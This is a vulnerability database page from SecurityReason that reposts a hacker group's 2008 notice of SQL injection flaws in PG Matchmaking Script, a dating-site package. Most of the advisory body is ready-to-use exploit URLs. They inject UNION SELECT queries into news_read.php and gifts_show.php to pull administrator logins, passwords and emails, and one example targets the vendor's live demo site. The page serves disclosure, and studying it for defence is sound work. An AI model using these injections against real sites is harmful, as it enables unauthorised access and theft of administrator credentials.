|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 4466 CVE : CVE-2008-4665 CWE : CWE-89 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes
Credit : Super Cristal Published : 23.10.2008
Advisory Content : =========================================================================== ======================================= SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M S N N N A A K K E S T E A A M M M SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M ===================================================SNAKES TEAM==================================================== + = = PG Matchmaking Script Multiple Remote SQL Injection Vulnerability + + = ==============================================:::ALGERIAN HaCkEr:::=============================================== = = = = = = Discovered By: Super Cristal :::ALGERIAN HaCkEr::: = = = = = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = = = = = :::::Mail: Super_Cristal@hotmail.com::::::: = = = = = = ::::script Demo: http://www.datingpro.com/matchmaking/demo::::= = = = ======================================Super Cristal=================================== #product home: datingpro.com #dork:find it Exploit(1): ******** http://localhost/[script_path]/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS-- Exploit(2): http://localhost/[script_path]/gifts_show.php?id=-101 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS-- demo:::: http://www.datingpro.com/matchmaking/demo/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS-- =========================================================================== ======================================== Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkE rS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members =========================================================================== ======================================== ::::Super_Cristal@Hotmail.CoM:::: References : http://securityreason.com/expldownload/1/4813/1 (Exploit) http://xforce.iss.net/xforce/xfdb/45496
http://www.securityfocus.com/bid/31477
http://www.milw0rm.com/exploits/6626
http://www.frsirt.com/english/advisories/2008/2698  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
libopie __readrec() off-by-one
This advisory is related to new FreeBSD advisory FreeBSD-SA-10:05.opie. |
||
| Apache |  |
|
» Apache ActiveMQ 5.4.0 |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2010-04-23| Copyright © SecurityReason.com. All Rights Reserved. |